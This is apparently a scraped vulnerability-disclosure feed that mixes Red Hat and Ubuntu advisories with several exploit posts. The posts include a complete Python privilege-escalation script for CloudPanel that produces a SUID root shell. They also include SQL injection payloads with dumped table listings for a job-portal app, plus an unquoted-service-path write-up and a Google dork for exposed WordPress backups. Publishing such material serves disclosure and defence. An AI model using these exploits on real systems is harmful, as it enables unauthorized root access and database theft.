USB Flash Drives Control version 4.1.0.0 suffers from an unquoted service path vulnerability.

    # Exploit Title: USB Flash Drives Control 4.1.0.0 - Unquoted Service Path# Date: 2023-31-05# Exploit Author: Jeffrey Bencteux# Vendor Homepage: https://binisoft.org/# Software Link: https://binisoft.org/wfc# Version: 4.1.0.0# Tested on: Microsoft Windows 11 Pro# Vulnerability Type: Unquoted Service PathPS C:\> wmic service get name,displayname,pathname,startmode |findstr /i"auto" |findstr /i /v "c:\windows"USB Flash Drives Control       usbcs       C:\Program Files\USB FlashDrives Control\usbcs.exe       AutoPS C:\> sc.exe qc usbcs[SC] QueryServiceConfig SUCCESSSERVICE_NAME: usbcs        TYPE               : 10  WIN32_OWN_PROCESS        START_TYPE         : 2   AUTO_START        ERROR_CONTROL      : 1   NORMAL        BINARY_PATH_NAME   : C:\Program Files\USB Flash DrivesControl\usbcs.exe        LOAD_ORDER_GROUP   :        TAG                : 0        DISPLAY_NAME       : USB Flash Drives Control        DEPENDENCIES       :        SERVICE_START_NAME : LocalSystemPS C:\> systeminfoOS Name:                   Microsoft Windows 11 ProOS Version:                10.0.22621 N/A Build 22621OS Manufacturer:           Microsoft Corporation-- Jeffrey BENCTEUX

USB Flash Drives Control 4.1.0.0 Unquoted Service Path

Red Hat Security Advisory 2023-3489-01 - Red Hat Directory Server is an LDAPv3-compliant directory server. The suite of packages includes the Lightweight Directory Access Protocol server, as well as command-line utilities and Web UI packages for server administration.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: redhat-ds:12 security, bug fix, and enhancement update  
Advisory ID:       RHSA-2023:3489-01  
Product:           Red Hat Directory Server  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3489  
Issue date:        2023-06-06  
CVE Names:         CVE-2023-1055   
=====================================================================

1. Summary:

An update for the redhat-ds:12 module is now available for Red Hat  
Directory Server 12.1 for RHEL 9.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Directory Server 12.1 for RHEL 9 - noarch, x86_64

3. Description:

Red Hat Directory Server is an LDAPv3-compliant directory server. The suite  
of packages includes the Lightweight Directory Access Protocol (LDAP)  
server, as well as command-line utilities and Web UI packages for server  
administration.

Security Fix(es):

* RHDS: LDAP browser tries to decode userPassword instead of  
userCertificate attribute (CVE-2023-1055)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Users of Red Hat Directory Server 12 are advised to upgrade to these  
updated packages.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2151865 - dscreate tries to relabel directories for non-root instance  
2168723 - lib389 password policy DN handling is incorrect  
2173517 - CVE-2023-1055 RHDS: LDAP browser tries to decode userPassword instead of userCertificate attribute

6. Package List:

Red Hat Directory Server 12.1 for RHEL 9:

Source:  
389-ds-base-2.1.8-1.module+el9dsrv+18377+a10e6f72.src.rpm

noarch:  
cockpit-389-ds-2.1.8-1.module+el9dsrv+18377+a10e6f72.noarch.rpm  
python3-lib389-2.1.8-1.module+el9dsrv+18377+a10e6f72.noarch.rpm

x86_64:  
389-ds-base-2.1.8-1.module+el9dsrv+18377+a10e6f72.x86_64.rpm  
389-ds-base-debuginfo-2.1.8-1.module+el9dsrv+18377+a10e6f72.x86_64.rpm  
389-ds-base-debugsource-2.1.8-1.module+el9dsrv+18377+a10e6f72.x86_64.rpm  
389-ds-base-devel-2.1.8-1.module+el9dsrv+18377+a10e6f72.x86_64.rpm  
389-ds-base-libs-2.1.8-1.module+el9dsrv+18377+a10e6f72.x86_64.rpm  
389-ds-base-libs-debuginfo-2.1.8-1.module+el9dsrv+18377+a10e6f72.x86_64.rpm  
389-ds-base-snmp-2.1.8-1.module+el9dsrv+18377+a10e6f72.x86_64.rpm  
389-ds-base-snmp-debuginfo-2.1.8-1.module+el9dsrv+18377+a10e6f72.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-1055  
https://access.redhat.com/security/updates/classification/#moderate  
https://access.redhat.com/security/cve/CVE-2023-1055

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZH9z4NzjgjWX9erEAQglxQ/8DIB198k6KaIodKmubNKms2ripiGshW9j  
nNDZzspIwcDdzWSUrkuZliB8a6zjwCMvGlbullEd5CuLZI8o0V9CsMccslmePYw2  
YWk4nky3jxRxFecHCTIiHuAsrGfNlSQDKDcsqIGzNEnFc+sIqaeHoKXa5WIeNONk  
BXntIflcoed4QqbrYW1pJZhZ0Q0S/EfRSBAaYzOh23Y+pXopZHchYwhFyMvmWpqK  
cK2uQoQfqqRZiElQ1HICrqhcwhrg5R434ks1X2vYzGvfA33wOBO+uIaa081Klhbv  
hr8fygZFy9M8Q7tC9goNi1JWOlWH1afZilJzMQ4i/GQbUBYZJMR5eAbR+amq68U/  
7i+B3q2BwMwpu+tEqjL/PLElRmScfc5xzjRZPQdj7c/wly6OvkptZXGeSsZqmoU/  
HhA2zpvPdaFVUQano7Qp3MOl52JPpooJ01M9CL2q/sFQApDld7bTW1oP379CsaFB  
rTpW6yY0skDApt5O1s7/IpkNR1i+2Nkj2hexByAOd/ZNPTdcibCL6Fpms4LfExiC  
HcMv6YhXuMP1KQl3m4Iskm/wlp6YhVspJbWzFxaBftEi3Ti7PFvYEvsr9jnGAmrY  
W8lTT6M7EcZ0PgYeWyR0+E8GiPN4LRNk45SqYseew6mu2hVQUgVTFw14vZgH0u9r  
4FnRe8lV35c=  
=t0Cm  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3489-01

CloudPanel versions 2.0.0 through 2.2.2 suffer from a privilege escalation vulnerability when a traversal is leveraged against clpctlWrapper for which all normal users have sudo access.

    # Title : Privilege Escalation through path traversal# CVE ID : CVE-2023-33747# Exploit Author : EagleEye# Github : https://github.com/EagleTube/CloudPanel/tree/main/CVE-2023-33747# Version Affected : CloudPanel v2.0.0 - v2.2.2# Vendor : CloudPanel.io# Date : 31/05/2023 , 12:00 PM# Step : Login as ssh as user, and run `python3 CVE-2023-33747_GetRoot.py`# Date : 06 June 2023# CVE-2023-33747_GetRoot.pyimport osimport subprocessdef exec_command(command):process = subprocess.Popen(command.split(), stdout=subprocess.PIPE)output, error = process.communicate()def exploit():print('[+] Overriding file to writable')exec_command('sudo /usr/bin/clpctlWrapper system:permissions:reset --files=777 --path=../../../../../../../../../../usr/bin/clpctlWrapper')print('[+] Backup clpctlWrapper into tmp...')exec_command('cp /usr/bin/clpctlWrapper /tmp/clpctlWrapper')print('[+] Replacing clpctlWrapper with cp...')exec_command('cp /bin/bash /tmp/bash')print('[+] Assigning suid to /tmp/bash...')exec_command('cp /bin/chown /usr/bin/clpctlWrapper')exec_command('sudo /usr/bin/clpctlWrapper root:root /tmp/bash')exec_command('cp /bin/chmod /usr/bin/clpctlWrapper')exec_command('sudo /usr/bin/clpctlWrapper 6755 /tmp/bash')exec_command('cp /tmp/clpctlWrapper /usr/bin/clpctlWrapper')print('[+] Popping root shell...')os.system('/tmp/bash -p -c "chown root:root /usr/bin/clpctlWrapper && chmod 0700 /usr/bin/clpctlWrapper && python3 root.py"')if __name__ == '__main__':exploit()# root.pyimport osos.setreuid(0,0)os.setregid(0,0)os.system('/bin/bash')

CloudPanel 2.2.2 Privilege Escalation / Path Traversal

Expert Job Portal Management System version 1.0 suffers from a remote SQL injection vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://www.codester.com/items/20720/                                      ││  Vendor   : Expert IT Solution                                                         ││  Software : Expert Job Portal Management System 1.0                                    ││  Vuln Type: SQL Injection                                                              ││  Impact   : Database Access                                                            ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│ Release Notes:                                                                         ││ ═════════════                                                                          ││                                                                                        ││ SQL injection attacks can allow unauthorized access to sensitive data, modification of ││ data and crash the application or make it unavailable, leading to lost revenue and     ││ damage to a company's reputation.                                                      ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /company_type_info.phphttps://website/company_type_info.php?com_type=AgentGET parameter 'com_type' is vulnerable to SQL Injection---Parameter: com_type (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: com_type=Agent' AND 3360=3360 AND 'rCfC'='rCfC    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: com_type=Agent' AND (SELECT 4512 FROM (SELECT(SLEEP(5)))SCiH) AND 'MKSc'='MKSc    Type: UNION query    Title: Generic UNION query (NULL) - 20 columns    Payload: com_type=Agent' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7171787071,0x5174744e6d58704d494d494952476c6f4c666346534b45754e57696b444b45794e5758567a6e6163,0x71627a7a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ----[+] Starting the Attackfetching current databasecurrent database: 'sagor_****_job'fetching tables[38 tables]+---------------------------------+| all_country                     || city_manage                     || company_type                    || contact_manage                  || content_manage                  || division_manage                 || enroll_trainning                || exp_settings                    || job_apply                       || job_categories                  || job_listing                     || job_seeker_carieer_details      || job_seeker_education            || job_seeker_emp_histo            || job_seeker_image                || job_seeker_info                 || job_seeker_lang_pro             || job_seeker_other_relatiive_info || job_seeker_pref_details         || job_seeker_profess_info         || job_seeker_reff                 || job_seeker_resume               || job_seeker_specialization       || job_seeker_training             || job_seeker_upload_resume        || languages                       || package                         || pages                           || recurator_info                  || recurator_verification          || save_jobs                       || social_manage                   || subscribe                       || sup_ad_log                      || testmonial_manage               || timezones                       || trainning_category              || trainning_manage                |+---------------------------------+fetching columns for table 'sup_ad_log'[6 columns]+------------+--------------+| Column     | Type         |+------------+--------------+| status     | int(11)      || admin_role | int(11)      || email      | varchar(100) || id         | int(11)      || sup_pass   | varchar(100) || sup_user   | varchar(100) |+------------+--------------+[-] Done

Expert Job Portal Management System 1.0 SQL Injection

WordPress Updraft plugin version 0.6.1 suffers from an information disclosure vulnerability.

    ====================================================================================================================================| # Title     : WordPress - updraft 0.6.1 Backup Disclosure Vulnerability                                                          || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0.2(64-bit)                                            | | # Vendor    : https://fr.wordpress.org/plugins/updraft/                                                                          |  | # Dork      : "index of /wp-content/updraft/"                                                                                    |====================================================================================================================================P0C :[+] WordPress - updraft 0.6.1 appears to leave backups in a world accessible directory under the document root.[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : "/wp-content/updraft/"[+] https://127.0.0.1/programmerinjamamcom/test/wp-content/updraft/Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg                      |=======================================================================================================================================

WordPress Updraft 0.6.1 Backup Disclosure

Ubuntu Security Notice 6142-1 - Gal Goldshtein discovered that nghttp2 incorrectly handled certain inputs. If a user or an automated system were tricked into opening a specially crafted input file, a remote attacker could possibly use this issue to cause a denial of service.

==========================================================================  
Ubuntu Security Notice USN-6142-1  
June 06, 2023

nghttp2 vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 16.04 LTS (Available with Ubuntu Pro)

Summary:

nghttp2 could be made to crash if it opened a specially crafted file.

Software Description:  
- nghttp2: HTTP/2 C Library and tools

Details:

Gal Goldshtein discovered that nghttp2 incorrectly handled certain inputs. If  
a user or an automated system were tricked into opening a specially crafted  
input file, a remote attacker could possibly use this issue to cause a  
denial of service.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 20.04 LTS:  
   libnghttp2-14                   1.40.0-1ubuntu0.1  
   libnghttp2-dev                  1.40.0-1ubuntu0.1  
   nghttp2                         1.40.0-1ubuntu0.1  
   nghttp2-client                  1.40.0-1ubuntu0.1  
   nghttp2-proxy                   1.40.0-1ubuntu0.1  
   nghttp2-server                  1.40.0-1ubuntu0.1

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
   libnghttp2-14                   1.30.0-1ubuntu1+esm1  
   libnghttp2-dev                  1.30.0-1ubuntu1+esm1  
   nghttp2                         1.30.0-1ubuntu1+esm1  
   nghttp2-client                  1.30.0-1ubuntu1+esm1  
   nghttp2-proxy                   1.30.0-1ubuntu1+esm1  
   nghttp2-server                  1.30.0-1ubuntu1+esm1

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
   libnghttp2-14                   1.7.1-1ubuntu0.1~esm1  
   libnghttp2-dev                  1.7.1-1ubuntu0.1~esm1  
   nghttp2                         1.7.1-1ubuntu0.1~esm1  
   nghttp2-client                  1.7.1-1ubuntu0.1~esm1  
   nghttp2-proxy                   1.7.1-1ubuntu0.1~esm1  
   nghttp2-server                  1.7.1-1ubuntu0.1~esm1

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6142-1  
   CVE-2020-11080

Package Information:  
   https://launchpad.net/ubuntu/+source/nghttp2/1.40.0-1ubuntu0.1

Ubuntu Security Notice USN-6142-1

Red Hat Security Advisory 2023-3460-01 - The curl packages provide the libcurl library and the curl utility for downloading files from servers using various protocols, including HTTP, FTP, and LDAP. Issues addressed include a denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: curl security update  
Advisory ID:       RHSA-2023:3460-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3460  
Issue date:        2023-06-06  
CVE Names:         CVE-2022-32206 CVE-2023-23916   
=====================================================================

1. Summary:

An update for curl is now available for Red Hat Enterprise Linux 8.4  
Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4  
Telecommunications Update Service, and Red Hat Enterprise Linux 8.4 Update  
Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS AUS (v.8.4) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux BaseOS E4S (v.8.4) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux BaseOS TUS (v.8.4) - aarch64, ppc64le, s390x, x86_64

3. Description:

The curl packages provide the libcurl library and the curl utility for  
downloading files from servers using various protocols, including HTTP,  
FTP, and LDAP.

Security Fix(es):

* curl: HTTP compression denial of service (CVE-2022-32206)

* curl: HTTP multi-header compression denial of service (CVE-2023-23916)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2099300 - CVE-2022-32206 curl: HTTP compression denial of service  
2167815 - CVE-2023-23916 curl: HTTP multi-header compression denial of service

6. Package List:

Red Hat Enterprise Linux BaseOS AUS (v.8.4):

Source:  
curl-7.61.1-18.el8_4.3.src.rpm

aarch64:  
curl-7.61.1-18.el8_4.3.aarch64.rpm  
curl-debuginfo-7.61.1-18.el8_4.3.aarch64.rpm  
curl-debugsource-7.61.1-18.el8_4.3.aarch64.rpm  
curl-minimal-debuginfo-7.61.1-18.el8_4.3.aarch64.rpm  
libcurl-7.61.1-18.el8_4.3.aarch64.rpm  
libcurl-debuginfo-7.61.1-18.el8_4.3.aarch64.rpm  
libcurl-devel-7.61.1-18.el8_4.3.aarch64.rpm  
libcurl-minimal-7.61.1-18.el8_4.3.aarch64.rpm  
libcurl-minimal-debuginfo-7.61.1-18.el8_4.3.aarch64.rpm

ppc64le:  
curl-7.61.1-18.el8_4.3.ppc64le.rpm  
curl-debuginfo-7.61.1-18.el8_4.3.ppc64le.rpm  
curl-debugsource-7.61.1-18.el8_4.3.ppc64le.rpm  
curl-minimal-debuginfo-7.61.1-18.el8_4.3.ppc64le.rpm  
libcurl-7.61.1-18.el8_4.3.ppc64le.rpm  
libcurl-debuginfo-7.61.1-18.el8_4.3.ppc64le.rpm  
libcurl-devel-7.61.1-18.el8_4.3.ppc64le.rpm  
libcurl-minimal-7.61.1-18.el8_4.3.ppc64le.rpm  
libcurl-minimal-debuginfo-7.61.1-18.el8_4.3.ppc64le.rpm

s390x:  
curl-7.61.1-18.el8_4.3.s390x.rpm  
curl-debuginfo-7.61.1-18.el8_4.3.s390x.rpm  
curl-debugsource-7.61.1-18.el8_4.3.s390x.rpm  
curl-minimal-debuginfo-7.61.1-18.el8_4.3.s390x.rpm  
libcurl-7.61.1-18.el8_4.3.s390x.rpm  
libcurl-debuginfo-7.61.1-18.el8_4.3.s390x.rpm  
libcurl-devel-7.61.1-18.el8_4.3.s390x.rpm  
libcurl-minimal-7.61.1-18.el8_4.3.s390x.rpm  
libcurl-minimal-debuginfo-7.61.1-18.el8_4.3.s390x.rpm

x86_64:  
curl-7.61.1-18.el8_4.3.x86_64.rpm  
curl-debuginfo-7.61.1-18.el8_4.3.i686.rpm  
curl-debuginfo-7.61.1-18.el8_4.3.x86_64.rpm  
curl-debugsource-7.61.1-18.el8_4.3.i686.rpm  
curl-debugsource-7.61.1-18.el8_4.3.x86_64.rpm  
curl-minimal-debuginfo-7.61.1-18.el8_4.3.i686.rpm  
curl-minimal-debuginfo-7.61.1-18.el8_4.3.x86_64.rpm  
libcurl-7.61.1-18.el8_4.3.i686.rpm  
libcurl-7.61.1-18.el8_4.3.x86_64.rpm  
libcurl-debuginfo-7.61.1-18.el8_4.3.i686.rpm  
libcurl-debuginfo-7.61.1-18.el8_4.3.x86_64.rpm  
libcurl-devel-7.61.1-18.el8_4.3.i686.rpm  
libcurl-devel-7.61.1-18.el8_4.3.x86_64.rpm  
libcurl-minimal-7.61.1-18.el8_4.3.i686.rpm  
libcurl-minimal-7.61.1-18.el8_4.3.x86_64.rpm  
libcurl-minimal-debuginfo-7.61.1-18.el8_4.3.i686.rpm  
libcurl-minimal-debuginfo-7.61.1-18.el8_4.3.x86_64.rpm

Red Hat Enterprise Linux BaseOS E4S (v.8.4):

Source:  
curl-7.61.1-18.el8_4.3.src.rpm

aarch64:  
curl-7.61.1-18.el8_4.3.aarch64.rpm  
curl-debuginfo-7.61.1-18.el8_4.3.aarch64.rpm  
curl-debugsource-7.61.1-18.el8_4.3.aarch64.rpm  
curl-minimal-debuginfo-7.61.1-18.el8_4.3.aarch64.rpm  
libcurl-7.61.1-18.el8_4.3.aarch64.rpm  
libcurl-debuginfo-7.61.1-18.el8_4.3.aarch64.rpm  
libcurl-devel-7.61.1-18.el8_4.3.aarch64.rpm  
libcurl-minimal-7.61.1-18.el8_4.3.aarch64.rpm  
libcurl-minimal-debuginfo-7.61.1-18.el8_4.3.aarch64.rpm

ppc64le:  
curl-7.61.1-18.el8_4.3.ppc64le.rpm  
curl-debuginfo-7.61.1-18.el8_4.3.ppc64le.rpm  
curl-debugsource-7.61.1-18.el8_4.3.ppc64le.rpm  
curl-minimal-debuginfo-7.61.1-18.el8_4.3.ppc64le.rpm  
libcurl-7.61.1-18.el8_4.3.ppc64le.rpm  
libcurl-debuginfo-7.61.1-18.el8_4.3.ppc64le.rpm  
libcurl-devel-7.61.1-18.el8_4.3.ppc64le.rpm  
libcurl-minimal-7.61.1-18.el8_4.3.ppc64le.rpm  
libcurl-minimal-debuginfo-7.61.1-18.el8_4.3.ppc64le.rpm

s390x:  
curl-7.61.1-18.el8_4.3.s390x.rpm  
curl-debuginfo-7.61.1-18.el8_4.3.s390x.rpm  
curl-debugsource-7.61.1-18.el8_4.3.s390x.rpm  
curl-minimal-debuginfo-7.61.1-18.el8_4.3.s390x.rpm  
libcurl-7.61.1-18.el8_4.3.s390x.rpm  
libcurl-debuginfo-7.61.1-18.el8_4.3.s390x.rpm  
libcurl-devel-7.61.1-18.el8_4.3.s390x.rpm  
libcurl-minimal-7.61.1-18.el8_4.3.s390x.rpm  
libcurl-minimal-debuginfo-7.61.1-18.el8_4.3.s390x.rpm

x86_64:  
curl-7.61.1-18.el8_4.3.x86_64.rpm  
curl-debuginfo-7.61.1-18.el8_4.3.i686.rpm  
curl-debuginfo-7.61.1-18.el8_4.3.x86_64.rpm  
curl-debugsource-7.61.1-18.el8_4.3.i686.rpm  
curl-debugsource-7.61.1-18.el8_4.3.x86_64.rpm  
curl-minimal-debuginfo-7.61.1-18.el8_4.3.i686.rpm  
curl-minimal-debuginfo-7.61.1-18.el8_4.3.x86_64.rpm  
libcurl-7.61.1-18.el8_4.3.i686.rpm  
libcurl-7.61.1-18.el8_4.3.x86_64.rpm  
libcurl-debuginfo-7.61.1-18.el8_4.3.i686.rpm  
libcurl-debuginfo-7.61.1-18.el8_4.3.x86_64.rpm  
libcurl-devel-7.61.1-18.el8_4.3.i686.rpm  
libcurl-devel-7.61.1-18.el8_4.3.x86_64.rpm  
libcurl-minimal-7.61.1-18.el8_4.3.i686.rpm  
libcurl-minimal-7.61.1-18.el8_4.3.x86_64.rpm  
libcurl-minimal-debuginfo-7.61.1-18.el8_4.3.i686.rpm  
libcurl-minimal-debuginfo-7.61.1-18.el8_4.3.x86_64.rpm

Red Hat Enterprise Linux BaseOS TUS (v.8.4):

Source:  
curl-7.61.1-18.el8_4.3.src.rpm

aarch64:  
curl-7.61.1-18.el8_4.3.aarch64.rpm  
curl-debuginfo-7.61.1-18.el8_4.3.aarch64.rpm  
curl-debugsource-7.61.1-18.el8_4.3.aarch64.rpm  
curl-minimal-debuginfo-7.61.1-18.el8_4.3.aarch64.rpm  
libcurl-7.61.1-18.el8_4.3.aarch64.rpm  
libcurl-debuginfo-7.61.1-18.el8_4.3.aarch64.rpm  
libcurl-devel-7.61.1-18.el8_4.3.aarch64.rpm  
libcurl-minimal-7.61.1-18.el8_4.3.aarch64.rpm  
libcurl-minimal-debuginfo-7.61.1-18.el8_4.3.aarch64.rpm

ppc64le:  
curl-7.61.1-18.el8_4.3.ppc64le.rpm  
curl-debuginfo-7.61.1-18.el8_4.3.ppc64le.rpm  
curl-debugsource-7.61.1-18.el8_4.3.ppc64le.rpm  
curl-minimal-debuginfo-7.61.1-18.el8_4.3.ppc64le.rpm  
libcurl-7.61.1-18.el8_4.3.ppc64le.rpm  
libcurl-debuginfo-7.61.1-18.el8_4.3.ppc64le.rpm  
libcurl-devel-7.61.1-18.el8_4.3.ppc64le.rpm  
libcurl-minimal-7.61.1-18.el8_4.3.ppc64le.rpm  
libcurl-minimal-debuginfo-7.61.1-18.el8_4.3.ppc64le.rpm

s390x:  
curl-7.61.1-18.el8_4.3.s390x.rpm  
curl-debuginfo-7.61.1-18.el8_4.3.s390x.rpm  
curl-debugsource-7.61.1-18.el8_4.3.s390x.rpm  
curl-minimal-debuginfo-7.61.1-18.el8_4.3.s390x.rpm  
libcurl-7.61.1-18.el8_4.3.s390x.rpm  
libcurl-debuginfo-7.61.1-18.el8_4.3.s390x.rpm  
libcurl-devel-7.61.1-18.el8_4.3.s390x.rpm  
libcurl-minimal-7.61.1-18.el8_4.3.s390x.rpm  
libcurl-minimal-debuginfo-7.61.1-18.el8_4.3.s390x.rpm

x86_64:  
curl-7.61.1-18.el8_4.3.x86_64.rpm  
curl-debuginfo-7.61.1-18.el8_4.3.i686.rpm  
curl-debuginfo-7.61.1-18.el8_4.3.x86_64.rpm  
curl-debugsource-7.61.1-18.el8_4.3.i686.rpm  
curl-debugsource-7.61.1-18.el8_4.3.x86_64.rpm  
curl-minimal-debuginfo-7.61.1-18.el8_4.3.i686.rpm  
curl-minimal-debuginfo-7.61.1-18.el8_4.3.x86_64.rpm  
libcurl-7.61.1-18.el8_4.3.i686.rpm  
libcurl-7.61.1-18.el8_4.3.x86_64.rpm  
libcurl-debuginfo-7.61.1-18.el8_4.3.i686.rpm  
libcurl-debuginfo-7.61.1-18.el8_4.3.x86_64.rpm  
libcurl-devel-7.61.1-18.el8_4.3.i686.rpm  
libcurl-devel-7.61.1-18.el8_4.3.x86_64.rpm  
libcurl-minimal-7.61.1-18.el8_4.3.i686.rpm  
libcurl-minimal-7.61.1-18.el8_4.3.x86_64.rpm  
libcurl-minimal-debuginfo-7.61.1-18.el8_4.3.i686.rpm  
libcurl-minimal-debuginfo-7.61.1-18.el8_4.3.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-32206  
https://access.redhat.com/security/cve/CVE-2023-23916  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZH8fmNzjgjWX9erEAQhwWhAAihPZFD+07+tsujy6vcmAJ1qHNNzZKtTL  
HPQ2qIJRrcIxoM2gnwhOnPWYYuO1yAUVizJUWe+xTDbkzQmzQYXprRpdwqcULqih  
ZSCNK1k8UGtERyUVbm9YyzGcVV+KHXvtQL7FkQFEpIwiCDtJCQoREa0fj2vEU4T0  
QwBzyvl8IuhdPH0O9Z0vfMRJcn5f1IA3qIeJQGyQbRH0DtKt+NFjlyBsu1B5uvp9  
VR9QxF13LsJD4kOpAZ/nklOofUYa+CtWTLAhnxmKSYqJcSab8+ulaCtGsoP4TQeV  
WowqvP7Tp8NN2XCGu5x/EwHKK3vJGGQWkbp14M+4uGTG4UY+qIdogRLSI2EFkaLV  
ndLLj1EtoIUw905g8fcvIlZ4MJmuO1lzMaTbLL/NHcqnBtkJXQToESHpg4tRpc2G  
bHuyAP5cC0DxAlNGBpfuV/Je9J+zqS/YqaoULsvX2UBBxI4sN/2rtdiNWvQxoP11  
GdH4lBszF9IWJGKWgh9AOsV5VK7gDzSBSPrsL3PWRv/BiYKt4iDMvRDYkpuEgeos  
rJ98VghY0K4pczvlHIs1/PboiqDDqLOLA5n/or7vHJm+yh3wfp1hr5V0QUo6ncYr  
/M9lvdqEWxRHLcmUd8a4OavTn5b1Bkv0vHqXK1VKMepCFN9uW1xB39lwsgNJuNDh  
XzXU/fx8IJI=  
=KCBX  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3460-01

Ubuntu Security Notice 6141-1 - Robin Peraglie and Johannes Moritz discovered that xfce4-settings incorrectly parsed quoted input when processed through xdg-open. A remote attacker could possibly use this issue to inject arbitrary arguments into the default browser or file manager.

==========================================================================  
Ubuntu Security Notice USN-6141-1  
June 06, 2023

xfce4-settings vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.10  
- Ubuntu 22.04 LTS

Summary:

xfce4-settings could be made to run programs with arbitrary arguments  
if it received specially crafted input.

Software Description:  
- xfce4-settings: graphical application for managing Xfce settings

Details:

Robin Peraglie and Johannes Moritz discovered that xfce4-settings  
incorrectly parsed quoted input when processed through xdg-open.  
A remote attacker could possibly use this issue to inject  
arbitrary arguments into the default browser or file manager.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.10:  
   xfce4-settings                  4.16.2-1ubuntu2.22.10.1

Ubuntu 22.04 LTS:  
   xfce4-settings                  4.16.2-1ubuntu2.22.04.1

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6141-1  
   CVE-2022-45062

Package Information:  
https://launchpad.net/ubuntu/+source/xfce4-settings/4.16.2-1ubuntu2.22.10.1  
https://launchpad.net/ubuntu/+source/xfce4-settings/4.16.2-1ubuntu2.22.04.1

Ubuntu Security Notice USN-6141-1

Red Hat Security Advisory 2023-3465-01 - The kernel packages contain the Linux kernel, the core of any Linux operating system. Issues addressed include privilege escalation and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

